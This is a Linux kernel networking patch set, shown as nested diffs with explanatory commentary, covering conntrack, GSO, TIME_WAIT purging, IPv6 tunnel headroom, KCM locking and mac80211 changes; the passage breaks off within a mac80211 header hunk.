+diff --git a/net/bridge/br_netfilter_hooks.c b/net/bridge/br_netfilter_hooks.c
+index 9ac70c27da835..9229300881b5f 100644
+--- a/net/bridge/br_netfilter_hooks.c
++++ b/net/bridge/br_netfilter_hooks.c
+@@ -618,8 +618,12 @@ static unsigned int br_nf_local_in(void *priv,
+ 	if (likely(nf_ct_is_confirmed(ct)))
+ 		return NF_ACCEPT;
+ 
++	if (WARN_ON_ONCE(refcount_read(&nfct->use) != 1)) {
++		nf_reset_ct(skb);
++		return NF_ACCEPT;
++	}
++
+ 	WARN_ON_ONCE(skb_shared(skb));
+-	WARN_ON_ONCE(refcount_read(&nfct->use) != 1);
+ 
+ 	/* We can't call nf_confirm here, it would create a dependency
+ 	 * on nf_conntrack module.
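
The refcount WARN in br_nf_local_in() used to be a bare assertion; because the unexpected state is reachable with real traffic, the hunk turns it into recovery: keep the one-shot diagnostic, but detach the unconfirmed conntrack entry and accept the packet instead of carrying on with a broken assumption. The same principle, handle what untrusted input can trigger rather than just asserting about it, shows up again in the fou GRO hunk further down, where a WARN_ON_ONCE() around a reachable condition is dropped entirely. Schematically:

/* assertion-with-recovery for states that untrusted input can produce */
if (WARN_ON_ONCE(invariant_broken(skb))) {	/* hypothetical check */
	undo_partial_state(skb);		/* hypothetical cleanup */
	return NF_ACCEPT;			/* fail safe, keep running */
}
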
+diff --git a/net/core/filter.c b/net/core/filter.c
+index 210b881cb50b8..1cd5f146cafe4 100644
+--- a/net/core/filter.c
++++ b/net/core/filter.c
+@@ -2264,12 +2264,12 @@ static int __bpf_redirect_neigh_v6(struct sk_buff *skb, struct net_device *dev,
+ 
+ 	err = bpf_out_neigh_v6(net, skb, dev, nh);
+ 	if (unlikely(net_xmit_eval(err)))
+-		dev->stats.tx_errors++;
++		DEV_STATS_INC(dev, tx_errors);
+ 	else
+ 		ret = NET_XMIT_SUCCESS;
+ 	goto out_xmit;
+ out_drop:
+-	dev->stats.tx_errors++;
++	DEV_STATS_INC(dev, tx_errors);
+ 	kfree_skb(skb);
+ out_xmit:
+ 	return ret;
+@@ -2371,12 +2371,12 @@ static int __bpf_redirect_neigh_v4(struct sk_buff *skb, struct net_device *dev,
+ 
+ 	err = bpf_out_neigh_v4(net, skb, dev, nh);
+ 	if (unlikely(net_xmit_eval(err)))
+-		dev->stats.tx_errors++;
++		DEV_STATS_INC(dev, tx_errors);
+ 	else
+ 		ret = NET_XMIT_SUCCESS;
+ 	goto out_xmit;
+ out_drop:
+-	dev->stats.tx_errors++;
++	DEV_STATS_INC(dev, tx_errors);
+ 	kfree_skb(skb);
+ out_xmit:
+ 	return ret;
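
dev->stats.tx_errors++ is a plain read-modify-write, so two CPUs hitting the error path at once can lose an increment. DEV_STATS_INC() funnels the update through an atomic instead; in kernels of this vintage the net_device stats fields are unions of an unsigned long with an atomic_long_t twin, and the macro is roughly:

/* paraphrased from include/linux/netdevice.h */
#define DEV_STATS_INC(DEV, FIELD) atomic_long_inc(&(DEV)->stats.__##FIELD)

/* usage, as in the hunks above */
DEV_STATS_INC(dev, tx_errors);
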
+diff --git a/net/core/skbuff.c b/net/core/skbuff.c
+index 4d46788cd493a..768b8d65a5baa 100644
+--- a/net/core/skbuff.c
++++ b/net/core/skbuff.c
+@@ -5791,7 +5791,6 @@ EXPORT_SYMBOL(skb_ensure_writable);
+  */
+ int __skb_vlan_pop(struct sk_buff *skb, u16 *vlan_tci)
+ {
+-	struct vlan_hdr *vhdr;
+ 	int offset = skb->data - skb_mac_header(skb);
+ 	int err;
+ 
+@@ -5807,13 +5806,8 @@ int __skb_vlan_pop(struct sk_buff *skb, u16 *vlan_tci)
+ 
+ 	skb_postpull_rcsum(skb, skb->data + (2 * ETH_ALEN), VLAN_HLEN);
+ 
+-	vhdr = (struct vlan_hdr *)(skb->data + ETH_HLEN);
+-	*vlan_tci = ntohs(vhdr->h_vlan_TCI);
+-
+-	memmove(skb->data + VLAN_HLEN, skb->data, 2 * ETH_ALEN);
+-	__skb_pull(skb, VLAN_HLEN);
++	vlan_remove_tag(skb, vlan_tci);
+ 
+-	vlan_set_encap_proto(skb, vhdr);
+ 	skb->mac_header += VLAN_HLEN;
+ 
+ 	if (skb_network_offset(skb) < ETH_HLEN)
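
The four operations deleted from __skb_vlan_pop() above (read the TCI, shift the MAC addresses over the tag, pull 4 bytes, fix up skb->protocol) are exactly what the new vlan_remove_tag() helper in include/linux/if_vlan.h performs, so the same logic is available to other callers as well. Approximately:

/* approximately the helper's body, see include/linux/if_vlan.h */
static inline void vlan_remove_tag(struct sk_buff *skb, u16 *vlan_tci)
{
	struct vlan_hdr *vhdr = (struct vlan_hdr *)(skb->data + ETH_HLEN);

	*vlan_tci = ntohs(vhdr->h_vlan_TCI);		/* extract the TCI */
	memmove(skb->data + VLAN_HLEN, skb->data, 2 * ETH_ALEN);
	__skb_pull(skb, VLAN_HLEN);			/* drop the 4-byte tag */
	vlan_set_encap_proto(skb, vhdr);		/* fix up skb->protocol */
}
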
+diff --git a/net/dccp/ipv4.c b/net/dccp/ipv4.c
+index f4a2dce3e1048..db8d54fb88060 100644
+--- a/net/dccp/ipv4.c
++++ b/net/dccp/ipv4.c
+@@ -1042,7 +1042,7 @@ static void __net_exit dccp_v4_exit_net(struct net *net)
+ 
+ static void __net_exit dccp_v4_exit_batch(struct list_head *net_exit_list)
+ {
+-	inet_twsk_purge(&dccp_hashinfo, AF_INET);
++	inet_twsk_purge(&dccp_hashinfo);
+ }
+ 
+ static struct pernet_operations dccp_v4_ops = {
+diff --git a/net/dccp/ipv6.c b/net/dccp/ipv6.c
+index 016af0301366d..d90bb941f2ada 100644
+--- a/net/dccp/ipv6.c
++++ b/net/dccp/ipv6.c
+@@ -1121,15 +1121,9 @@ static void __net_exit dccp_v6_exit_net(struct net *net)
+ 	inet_ctl_sock_destroy(pn->v6_ctl_sk);
+ }
+ 
+-static void __net_exit dccp_v6_exit_batch(struct list_head *net_exit_list)
+-{
+-	inet_twsk_purge(&dccp_hashinfo, AF_INET6);
+-}
+-
+ static struct pernet_operations dccp_v6_ops = {
+ 	.init   = dccp_v6_init_net,
+ 	.exit   = dccp_v6_exit_net,
+-	.exit_batch = dccp_v6_exit_batch,
+ 	.id	= &dccp_v6_pernet_id,
+ 	.size   = sizeof(struct dccp_v6_pernet),
+ };
+diff --git a/net/dsa/tag_ocelot.c b/net/dsa/tag_ocelot.c
+index 0d81f172b7a6e..ce9d2b20d67a9 100644
+--- a/net/dsa/tag_ocelot.c
++++ b/net/dsa/tag_ocelot.c
+@@ -4,40 +4,6 @@
+ #include <linux/dsa/ocelot.h>
+ #include "dsa_priv.h"
+ 
+-/* If the port is under a VLAN-aware bridge, remove the VLAN header from the
+- * payload and move it into the DSA tag, which will make the switch classify
+- * the packet to the bridge VLAN. Otherwise, leave the classified VLAN at zero,
+- * which is the pvid of standalone and VLAN-unaware bridge ports.
+- */
+-static void ocelot_xmit_get_vlan_info(struct sk_buff *skb, struct dsa_port *dp,
+-				      u64 *vlan_tci, u64 *tag_type)
+-{
+-	struct net_device *br = dsa_port_bridge_dev_get(dp);
+-	struct vlan_ethhdr *hdr;
+-	u16 proto, tci;
+-
+-	if (!br || !br_vlan_enabled(br)) {
+-		*vlan_tci = 0;
+-		*tag_type = IFH_TAG_TYPE_C;
+-		return;
+-	}
+-
+-	hdr = (struct vlan_ethhdr *)skb_mac_header(skb);
+-	br_vlan_get_proto(br, &proto);
+-
+-	if (ntohs(hdr->h_vlan_proto) == proto) {
+-		__skb_vlan_pop(skb, &tci);
+-		*vlan_tci = tci;
+-	} else {
+-		rcu_read_lock();
+-		br_vlan_get_pvid_rcu(br, &tci);
+-		rcu_read_unlock();
+-		*vlan_tci = tci;
+-	}
+-
+-	*tag_type = (proto != ETH_P_8021Q) ? IFH_TAG_TYPE_S : IFH_TAG_TYPE_C;
+-}
+-
+ static void ocelot_xmit_common(struct sk_buff *skb, struct net_device *netdev,
+ 			       __be32 ifh_prefix, void **ifh)
+ {
+@@ -49,7 +15,8 @@ static void ocelot_xmit_common(struct sk_buff *skb, struct net_device *netdev,
+ 	u32 rew_op = 0;
+ 	u64 qos_class;
+ 
+-	ocelot_xmit_get_vlan_info(skb, dp, &vlan_tci, &tag_type);
++	ocelot_xmit_get_vlan_info(skb, dsa_port_bridge_dev_get(dp), &vlan_tci,
++				  &tag_type);
+ 
+ 	qos_class = netdev_get_num_tc(netdev) ?
+ 		    netdev_get_prio_tc_map(netdev, skb->priority) : skb->priority;
+diff --git a/net/ipv4/fou.c b/net/ipv4/fou.c
+index 0c3c6d0cee290..358bff068eef8 100644
+--- a/net/ipv4/fou.c
++++ b/net/ipv4/fou.c
+@@ -431,7 +431,7 @@ static struct sk_buff *gue_gro_receive(struct sock *sk,
+ 
+ 	offloads = NAPI_GRO_CB(skb)->is_ipv6 ? inet6_offloads : inet_offloads;
+ 	ops = rcu_dereference(offloads[proto]);
+-	if (WARN_ON_ONCE(!ops || !ops->callbacks.gro_receive))
++	if (!ops || !ops->callbacks.gro_receive)
+ 		goto out;
+ 
+ 	pp = call_gro_receive(ops->callbacks.gro_receive, head, skb);
+diff --git a/net/ipv4/inet_timewait_sock.c b/net/ipv4/inet_timewait_sock.c
+index 340a8f0c29800..6356a8a47b345 100644
+--- a/net/ipv4/inet_timewait_sock.c
++++ b/net/ipv4/inet_timewait_sock.c
+@@ -282,14 +282,18 @@ void __inet_twsk_schedule(struct inet_timewait_sock *tw, int timeo, bool rearm)
+ EXPORT_SYMBOL_GPL(__inet_twsk_schedule);
+ 
+ /* Remove all non full sockets (TIME_WAIT and NEW_SYN_RECV) for dead netns */
+-void inet_twsk_purge(struct inet_hashinfo *hashinfo, int family)
++void inet_twsk_purge(struct inet_hashinfo *hashinfo)
+ {
++	struct inet_ehash_bucket *head = &hashinfo->ehash[0];
++	unsigned int ehash_mask = hashinfo->ehash_mask;
+ 	struct hlist_nulls_node *node;
+ 	unsigned int slot;
+ 	struct sock *sk;
+ 
+-	for (slot = 0; slot <= hashinfo->ehash_mask; slot++) {
+-		struct inet_ehash_bucket *head = &hashinfo->ehash[slot];
++	for (slot = 0; slot <= ehash_mask; slot++, head++) {
++		if (hlist_nulls_empty(&head->chain))
++			continue;
++
+ restart_rcu:
+ 		cond_resched();
+ 		rcu_read_lock();
+@@ -301,15 +305,13 @@ void inet_twsk_purge(struct inet_hashinfo *hashinfo, int family)
+ 					     TCPF_NEW_SYN_RECV))
+ 				continue;
+ 
+-			if (sk->sk_family != family ||
+-			    refcount_read(&sock_net(sk)->ns.count))
++			if (refcount_read(&sock_net(sk)->ns.count))
+ 				continue;
+ 
+ 			if (unlikely(!refcount_inc_not_zero(&sk->sk_refcnt)))
+ 				continue;
+ 
+-			if (unlikely(sk->sk_family != family ||
+-				     refcount_read(&sock_net(sk)->ns.count))) {
++			if (refcount_read(&sock_net(sk)->ns.count)) {
+ 				sock_gen_put(sk);
+ 				goto restart;
+ 			}
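
Dropping the family argument means one pass of inet_twsk_purge() now reaps TIME_WAIT and NEW_SYN_RECV sockets of every family whose netns is dead, which is why the dccp_v6 exit_batch hook (earlier in this patch) and the tcpv6 one (later) can be deleted; skipping empty buckets before taking the RCU lock just makes the full ehash walk cheaper. The per-socket logic keeps the usual lockless double-check, since everything can change between the unlocked read and the refcount bump:

sk_nulls_for_each_rcu(sk, node, &head->chain) {
	if (refcount_read(&sock_net(sk)->ns.count))
		continue;	/* netns still alive: not ours to purge */

	if (unlikely(!refcount_inc_not_zero(&sk->sk_refcnt)))
		continue;	/* socket already being freed */

	if (refcount_read(&sock_net(sk)->ns.count)) {
		sock_gen_put(sk);	/* lost the race: drop and rescan */
		goto restart;
	}
	/* ... unhash the socket and restart the bucket ... */
}
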
+diff --git a/net/ipv4/tcp_ipv4.c b/net/ipv4/tcp_ipv4.c
+index c64ba4f8ddaa9..1327447a3aade 100644
+--- a/net/ipv4/tcp_ipv4.c
++++ b/net/ipv4/tcp_ipv4.c
+@@ -93,6 +93,8 @@ EXPORT_SYMBOL(tcp_hashinfo);
+ 
+ static DEFINE_PER_CPU(struct sock *, ipv4_tcp_sk);
+ 
++static DEFINE_MUTEX(tcp_exit_batch_mutex);
++
+ static u32 tcp_v4_init_seq(const struct sk_buff *skb)
+ {
+ 	return secure_tcp_seq(ip_hdr(skb)->daddr,
+@@ -3242,13 +3244,25 @@ static void __net_exit tcp_sk_exit_batch(struct list_head *net_exit_list)
+ {
+ 	struct net *net;
+ 
+-	tcp_twsk_purge(net_exit_list, AF_INET);
++	/* make sure concurrent calls to tcp_sk_exit_batch from net_cleanup_work
++	 * and failed setup_net error unwinding path are serialized.
++	 *
++	 * tcp_twsk_purge() handles twsk in any dead netns, not just those in
++	 * net_exit_list, so the thread that dismantles a particular twsk must
++	 * do so without another thread progressing to refcount_dec_and_test() of
++	 * tcp_death_row.tw_refcount.
++	 */
++	mutex_lock(&tcp_exit_batch_mutex);
++
++	tcp_twsk_purge(net_exit_list);
+ 
+ 	list_for_each_entry(net, net_exit_list, exit_list) {
+ 		inet_pernet_hashinfo_free(net->ipv4.tcp_death_row.hashinfo);
+ 		WARN_ON_ONCE(!refcount_dec_and_test(&net->ipv4.tcp_death_row.tw_refcount));
+ 		tcp_fastopen_ctx_destroy(net);
+ 	}
++
++	mutex_unlock(&tcp_exit_batch_mutex);
+ }
+ 
+ static struct pernet_operations __net_initdata tcp_sk_ops = {
+diff --git a/net/ipv4/tcp_minisocks.c b/net/ipv4/tcp_minisocks.c
+index b3bfa1a09df68..c562cb965e742 100644
+--- a/net/ipv4/tcp_minisocks.c
++++ b/net/ipv4/tcp_minisocks.c
+@@ -347,7 +347,7 @@ void tcp_twsk_destructor(struct sock *sk)
+ }
+ EXPORT_SYMBOL_GPL(tcp_twsk_destructor);
+ 
+-void tcp_twsk_purge(struct list_head *net_exit_list, int family)
++void tcp_twsk_purge(struct list_head *net_exit_list)
+ {
+ 	bool purged_once = false;
+ 	struct net *net;
+@@ -355,14 +355,13 @@ void tcp_twsk_purge(struct list_head *net_exit_list, int family)
+ 	list_for_each_entry(net, net_exit_list, exit_list) {
+ 		if (net->ipv4.tcp_death_row.hashinfo->pernet) {
+ 			/* Even if tw_refcount == 1, we must clean up kernel reqsk */
+-			inet_twsk_purge(net->ipv4.tcp_death_row.hashinfo, family);
++			inet_twsk_purge(net->ipv4.tcp_death_row.hashinfo);
+ 		} else if (!purged_once) {
+-			inet_twsk_purge(&tcp_hashinfo, family);
++			inet_twsk_purge(&tcp_hashinfo);
+ 			purged_once = true;
+ 		}
+ 	}
+ }
+-EXPORT_SYMBOL_GPL(tcp_twsk_purge);
+ 
+ /* Warning : This function is called without sk_listener being locked.
+  * Be sure to read socket fields once, as their value could change under us.
+diff --git a/net/ipv4/tcp_offload.c b/net/ipv4/tcp_offload.c
+index 4851211aa60d6..72a645bf05c92 100644
+--- a/net/ipv4/tcp_offload.c
++++ b/net/ipv4/tcp_offload.c
+@@ -72,6 +72,9 @@ struct sk_buff *tcp_gso_segment(struct sk_buff *skb,
+ 	if (thlen < sizeof(*th))
+ 		goto out;
+ 
++	if (unlikely(skb_checksum_start(skb) != skb_transport_header(skb)))
++		goto out;
++
+ 	if (!pskb_may_pull(skb, thlen))
+ 		goto out;
+ 
+diff --git a/net/ipv4/udp_offload.c b/net/ipv4/udp_offload.c
+index 794ea24292f62..84cc3f6e14728 100644
+--- a/net/ipv4/udp_offload.c
++++ b/net/ipv4/udp_offload.c
+@@ -273,13 +273,25 @@ struct sk_buff *__udp_gso_segment(struct sk_buff *gso_skb,
+ 	__sum16 check;
+ 	__be16 newlen;
+ 
+-	if (skb_shinfo(gso_skb)->gso_type & SKB_GSO_FRAGLIST)
+-		return __udp_gso_segment_list(gso_skb, features, is_ipv6);
+-
+ 	mss = skb_shinfo(gso_skb)->gso_size;
+ 	if (gso_skb->len <= sizeof(*uh) + mss)
+ 		return ERR_PTR(-EINVAL);
+ 
++	if (unlikely(skb_checksum_start(gso_skb) !=
++		     skb_transport_header(gso_skb) &&
++		     !(skb_shinfo(gso_skb)->gso_type & SKB_GSO_FRAGLIST)))
++		return ERR_PTR(-EINVAL);
++
++	if (skb_gso_ok(gso_skb, features | NETIF_F_GSO_ROBUST)) {
++		/* Packet is from an untrusted source, reset gso_segs. */
++		skb_shinfo(gso_skb)->gso_segs = DIV_ROUND_UP(gso_skb->len - sizeof(*uh),
++							     mss);
++		return NULL;
++	}
++
++	if (skb_shinfo(gso_skb)->gso_type & SKB_GSO_FRAGLIST)
++		return __udp_gso_segment_list(gso_skb, features, is_ipv6);
++
+ 	skb_pull(gso_skb, sizeof(*uh));
+ 
+ 	/* clear destructor to avoid skb_segment assigning it to tail */
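
Two checks move to the front of __udp_gso_segment(): GSO packets whose checksum start does not line up with the transport header are rejected before any segmentation work (the fraglist case keeps its own layout and is exempt), and packets a robust-GSO device can emit as-is get only their gso_segs recomputed. That recomputation is plain ceiling division over the UDP payload:

/* segments = ceil(payload / mss); e.g. a 3000-byte payload at
 * mss 1400 gives DIV_ROUND_UP(3000, 1400) = 3 segments
 */
skb_shinfo(gso_skb)->gso_segs =
	DIV_ROUND_UP(gso_skb->len - sizeof(struct udphdr), mss);
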
+diff --git a/net/ipv6/ip6_output.c b/net/ipv6/ip6_output.c
+index df79044fbf3c4..f2227e662d1cf 100644
+--- a/net/ipv6/ip6_output.c
++++ b/net/ipv6/ip6_output.c
+@@ -69,11 +69,15 @@ static int ip6_finish_output2(struct net *net, struct sock *sk, struct sk_buff *
+ 
+ 	/* Be paranoid, rather than too clever. */
+ 	if (unlikely(hh_len > skb_headroom(skb)) && dev->header_ops) {
++		/* Make sure idev stays alive */
++		rcu_read_lock();
+ 		skb = skb_expand_head(skb, hh_len);
+ 		if (!skb) {
+ 			IP6_INC_STATS(net, idev, IPSTATS_MIB_OUTDISCARDS);
++			rcu_read_unlock();
+ 			return -ENOMEM;
+ 		}
++		rcu_read_unlock();
+ 	}
+ 
+ 	hdr = ipv6_hdr(skb);
+@@ -274,11 +278,15 @@ int ip6_xmit(const struct sock *sk, struct sk_buff *skb, struct flowi6 *fl6,
+ 		head_room += opt->opt_nflen + opt->opt_flen;
+ 
+ 	if (unlikely(head_room > skb_headroom(skb))) {
++		/* Make sure idev stays alive */
++		rcu_read_lock();
+ 		skb = skb_expand_head(skb, head_room);
+ 		if (!skb) {
+ 			IP6_INC_STATS(net, idev, IPSTATS_MIB_OUTDISCARDS);
++			rcu_read_unlock();
+ 			return -ENOBUFS;
+ 		}
++		rcu_read_unlock();
+ 	}
+ 
+ 	if (opt) {
+@@ -1993,6 +2001,7 @@ int ip6_send_skb(struct sk_buff *skb)
+ 	struct rt6_info *rt = (struct rt6_info *)skb_dst(skb);
+ 	int err;
+ 
++	rcu_read_lock();
+ 	err = ip6_local_out(net, skb->sk, skb);
+ 	if (err) {
+ 		if (err > 0)
+@@ -2002,6 +2011,7 @@ int ip6_send_skb(struct sk_buff *skb)
+ 				      IPSTATS_MIB_OUTDISCARDS);
+ 	}
+ 
++	rcu_read_unlock();
+ 	return err;
+ }
+ 
+diff --git a/net/ipv6/ip6_tunnel.c b/net/ipv6/ip6_tunnel.c
+index 2699915bb85be..f3324f2a40466 100644
+--- a/net/ipv6/ip6_tunnel.c
++++ b/net/ipv6/ip6_tunnel.c
+@@ -1510,7 +1510,8 @@ static void ip6_tnl_link_config(struct ip6_tnl *t)
+ 			tdev = __dev_get_by_index(t->net, p->link);
+ 
+ 		if (tdev) {
+-			dev->hard_header_len = tdev->hard_header_len + t_hlen;
++			dev->needed_headroom = tdev->hard_header_len +
++				tdev->needed_headroom + t_hlen;
+ 			mtu = min_t(unsigned int, tdev->mtu, IP6_MAX_MTU);
+ 
+ 			mtu = mtu - t_hlen;
+@@ -1734,7 +1735,9 @@ ip6_tnl_siocdevprivate(struct net_device *dev, struct ifreq *ifr,
+ int ip6_tnl_change_mtu(struct net_device *dev, int new_mtu)
+ {
+ 	struct ip6_tnl *tnl = netdev_priv(dev);
++	int t_hlen;
+ 
++	t_hlen = tnl->hlen + sizeof(struct ipv6hdr);
+ 	if (tnl->parms.proto == IPPROTO_IPV6) {
+ 		if (new_mtu < IPV6_MIN_MTU)
+ 			return -EINVAL;
+@@ -1743,10 +1746,10 @@ int ip6_tnl_change_mtu(struct net_device *dev, int new_mtu)
+ 			return -EINVAL;
+ 	}
+ 	if (tnl->parms.proto == IPPROTO_IPV6 || tnl->parms.proto == 0) {
+-		if (new_mtu > IP6_MAX_MTU - dev->hard_header_len)
++		if (new_mtu > IP6_MAX_MTU - dev->hard_header_len - t_hlen)
+ 			return -EINVAL;
+ 	} else {
+-		if (new_mtu > IP_MAX_MTU - dev->hard_header_len)
++		if (new_mtu > IP_MAX_MTU - dev->hard_header_len - t_hlen)
+ 			return -EINVAL;
+ 	}
+ 	dev->mtu = new_mtu;
+@@ -1892,12 +1895,11 @@ ip6_tnl_dev_init_gen(struct net_device *dev)
+ 	t_hlen = t->hlen + sizeof(struct ipv6hdr);
+ 
+ 	dev->type = ARPHRD_TUNNEL6;
+-	dev->hard_header_len = LL_MAX_HEADER + t_hlen;
+ 	dev->mtu = ETH_DATA_LEN - t_hlen;
+ 	if (!(t->parms.flags & IP6_TNL_F_IGN_ENCAP_LIMIT))
+ 		dev->mtu -= 8;
+ 	dev->min_mtu = ETH_MIN_MTU;
+-	dev->max_mtu = IP6_MAX_MTU - dev->hard_header_len;
++	dev->max_mtu = IP6_MAX_MTU - dev->hard_header_len - t_hlen;
+ 
+ 	netdev_hold(dev, &t->dev_tracker, GFP_KERNEL);
+ 	return 0;
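
The ip6_tunnel change stops folding the tunnel overhead into dev->hard_header_len, which misrepresents the link-layer header to upper layers, and advertises it through needed_headroom instead, also accounting for the lower device's own needed_headroom; the MTU bounds then subtract the tunnel header explicitly. With illustrative numbers for a plain ip6tnl device (tnl->hlen == 0, so t_hlen is just the 40-byte IPv6 header):

int t_hlen = tnl->hlen + sizeof(struct ipv6hdr);	/* 0 + 40 = 40 */

dev->needed_headroom = tdev->hard_header_len +
		       tdev->needed_headroom + t_hlen;

/* ip6_tnl_change_mtu(), IPv6 payload case: the new MTU plus all
 * header overhead must still fit under IP6_MAX_MTU
 */
if (new_mtu > IP6_MAX_MTU - dev->hard_header_len - t_hlen)
	return -EINVAL;
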
+diff --git a/net/ipv6/netfilter/nf_conntrack_reasm.c b/net/ipv6/netfilter/nf_conntrack_reasm.c
+index 87a394179092c..e4b45db8a3992 100644
+--- a/net/ipv6/netfilter/nf_conntrack_reasm.c
++++ b/net/ipv6/netfilter/nf_conntrack_reasm.c
+@@ -154,6 +154,10 @@ static struct frag_queue *fq_find(struct net *net, __be32 id, u32 user,
+ 	};
+ 	struct inet_frag_queue *q;
+ 
++	if (!(ipv6_addr_type(&hdr->daddr) & (IPV6_ADDR_MULTICAST |
++					    IPV6_ADDR_LINKLOCAL)))
++		key.iif = 0;
++
+ 	q = inet_frag_find(nf_frag->fqdir, &key);
+ 	if (!q)
+ 		return NULL;
+diff --git a/net/ipv6/tcp_ipv6.c b/net/ipv6/tcp_ipv6.c
+index eb6fc0e2a4533..06b4acbfd314b 100644
+--- a/net/ipv6/tcp_ipv6.c
++++ b/net/ipv6/tcp_ipv6.c
+@@ -2217,15 +2217,9 @@ static void __net_exit tcpv6_net_exit(struct net *net)
+ 	inet_ctl_sock_destroy(net->ipv6.tcp_sk);
+ }
+ 
+-static void __net_exit tcpv6_net_exit_batch(struct list_head *net_exit_list)
+-{
+-	tcp_twsk_purge(net_exit_list, AF_INET6);
+-}
+-
+ static struct pernet_operations tcpv6_net_ops = {
+ 	.init	    = tcpv6_net_init,
+ 	.exit	    = tcpv6_net_exit,
+-	.exit_batch = tcpv6_net_exit_batch,
+ };
+ 
+ int __init tcpv6_init(void)
+diff --git a/net/iucv/iucv.c b/net/iucv/iucv.c
+index db41eb2d977f2..038e1ba9aec27 100644
+--- a/net/iucv/iucv.c
++++ b/net/iucv/iucv.c
+@@ -1090,8 +1090,7 @@ static int iucv_message_receive_iprmdata(struct iucv_path *path,
+ 		size = (size < 8) ? size : 8;
+ 		for (array = buffer; size > 0; array++) {
+ 			copy = min_t(size_t, size, array->length);
+-			memcpy((u8 *)(addr_t) array->address,
+-				rmmsg, copy);
++			memcpy(phys_to_virt(array->address), rmmsg, copy);
+ 			rmmsg += copy;
+ 			size -= copy;
+ 		}
+diff --git a/net/kcm/kcmsock.c b/net/kcm/kcmsock.c
+index 7d37bf4334d26..462bdb6bfa4d8 100644
+--- a/net/kcm/kcmsock.c
++++ b/net/kcm/kcmsock.c
+@@ -912,6 +912,7 @@ static int kcm_sendmsg(struct socket *sock, struct msghdr *msg, size_t len)
+ 		  !(msg->msg_flags & MSG_MORE) : !!(msg->msg_flags & MSG_EOR);
+ 	int err = -EPIPE;
+ 
++	mutex_lock(&kcm->tx_mutex);
+ 	lock_sock(sk);
+ 
+ 	/* Per tcp_sendmsg this should be in poll */
+@@ -1060,6 +1061,7 @@ static int kcm_sendmsg(struct socket *sock, struct msghdr *msg, size_t len)
+ 	KCM_STATS_ADD(kcm->stats.tx_bytes, copied);
+ 
+ 	release_sock(sk);
++	mutex_unlock(&kcm->tx_mutex);
+ 	return copied;
+ 
+ out_error:
+@@ -1085,6 +1087,7 @@ static int kcm_sendmsg(struct socket *sock, struct msghdr *msg, size_t len)
+ 		sk->sk_write_space(sk);
+ 
+ 	release_sock(sk);
++	mutex_unlock(&kcm->tx_mutex);
+ 	return err;
+ }
+ 
+@@ -1325,6 +1328,7 @@ static void init_kcm_sock(struct kcm_sock *kcm, struct kcm_mux *mux)
+ 	spin_unlock_bh(&mux->lock);
+ 
+ 	INIT_WORK(&kcm->tx_work, kcm_tx_work);
++	mutex_init(&kcm->tx_mutex);
+ 
+ 	spin_lock_bh(&mux->rx_lock);
+ 	kcm_rcv_ready(kcm);
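
kcm_sendmsg() drops the socket lock internally (for example while waiting for transmit memory), so two senders on the same KCM socket could interleave partially built messages on the tx queue. The hunks serialize the whole operation with a per-socket mutex taken outside lock_sock(); the tx_mutex field itself is added to struct kcm_sock in include/net/kcm.h by the same upstream change. The resulting lock order:

mutex_lock(&kcm->tx_mutex);	/* 1: one sendmsg per KCM socket at a time */
lock_sock(sk);			/* 2: then the normal socket lock */

/* ... build the message, transmit, possibly sleep for memory ... */

release_sock(sk);		/* release in reverse order */
mutex_unlock(&kcm->tx_mutex);
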
+diff --git a/net/mac80211/agg-tx.c b/net/mac80211/agg-tx.c
+index 85d2b9e4b51ce..e26a72f3a1042 100644
+--- a/net/mac80211/agg-tx.c
++++ b/net/mac80211/agg-tx.c
+@@ -491,7 +491,7 @@ void ieee80211_tx_ba_session_handle_start(struct sta_info *sta, int tid)
+ {
+ 	struct tid_ampdu_tx *tid_tx;
+ 	struct ieee80211_local *local = sta->local;
+-	struct ieee80211_sub_if_data *sdata;
++	struct ieee80211_sub_if_data *sdata = sta->sdata;
+ 	struct ieee80211_ampdu_params params = {
+ 		.sta = &sta->sta,
+ 		.action = IEEE80211_AMPDU_TX_START,
+@@ -519,7 +519,6 @@ void ieee80211_tx_ba_session_handle_start(struct sta_info *sta, int tid)
+ 	 */
+ 	synchronize_net();
+ 
+-	sdata = sta->sdata;
+ 	params.ssn = sta->tid_seq[tid] >> 4;
+ 	ret = drv_ampdu_action(local, sdata, &params);
+ 	tid_tx->ssn = params.ssn;
+@@ -533,9 +532,6 @@ void ieee80211_tx_ba_session_handle_start(struct sta_info *sta, int tid)
+ 		 */
+ 		set_bit(HT_AGG_STATE_DRV_READY, &tid_tx->state);
+ 	} else if (ret) {
+-		if (!sdata)
+-			return;
+-
+ 		ht_dbg(sdata,
+ 		       "BA request denied - HW unavailable for %pM tid %d\n",
+ 		       sta->sta.addr, tid);
+diff --git a/net/mac80211/debugfs_netdev.c b/net/mac80211/debugfs_netdev.c
+index 08a1d7564b7f2..8ced615add712 100644
+--- a/net/mac80211/debugfs_netdev.c
++++ b/net/mac80211/debugfs_netdev.c
+@@ -603,8 +603,6 @@ IEEE80211_IF_FILE(fwded_mcast, u.mesh.mshstats.fwded_mcast, DEC);
+ IEEE80211_IF_FILE(fwded_unicast, u.mesh.mshstats.fwded_unicast, DEC);
+ IEEE80211_IF_FILE(fwded_frames, u.mesh.mshstats.fwded_frames, DEC);
+ IEEE80211_IF_FILE(dropped_frames_ttl, u.mesh.mshstats.dropped_frames_ttl, DEC);
+-IEEE80211_IF_FILE(dropped_frames_congestion,
+-		  u.mesh.mshstats.dropped_frames_congestion, DEC);
+ IEEE80211_IF_FILE(dropped_frames_no_route,
+ 		  u.mesh.mshstats.dropped_frames_no_route, DEC);
+ 
+@@ -741,7 +739,6 @@ static void add_mesh_stats(struct ieee80211_sub_if_data *sdata)
+ 	MESHSTATS_ADD(fwded_frames);
+ 	MESHSTATS_ADD(dropped_frames_ttl);
+ 	MESHSTATS_ADD(dropped_frames_no_route);
+-	MESHSTATS_ADD(dropped_frames_congestion);
+ #undef MESHSTATS_ADD
+ }
+ 
+diff --git a/net/mac80211/driver-ops.c b/net/mac80211/driver-ops.c
+index c08d3c9a4a177..5392ffa182704 100644
+--- a/net/mac80211/driver-ops.c
++++ b/net/mac80211/driver-ops.c
+@@ -391,9 +391,6 @@ int drv_ampdu_action(struct ieee80211_local *local,
+ 
+ 	might_sleep();
+ 
+-	if (!sdata)
+-		return -EIO;
+-
+ 	sdata = get_bss_sdata(sdata);
+ 	if (!check_sdata_in_driver(sdata))
+ 		return -EIO;
+diff --git a/net/mac80211/ieee80211_i.h b/net/mac80211/ieee80211_i.h
+index 709eb7bfcf194..8a3af4144d3f0 100644
+--- a/net/mac80211/ieee80211_i.h
++++ b/net/mac80211/ieee80211_i.h
+@@ -327,7 +327,6 @@ struct mesh_stats {
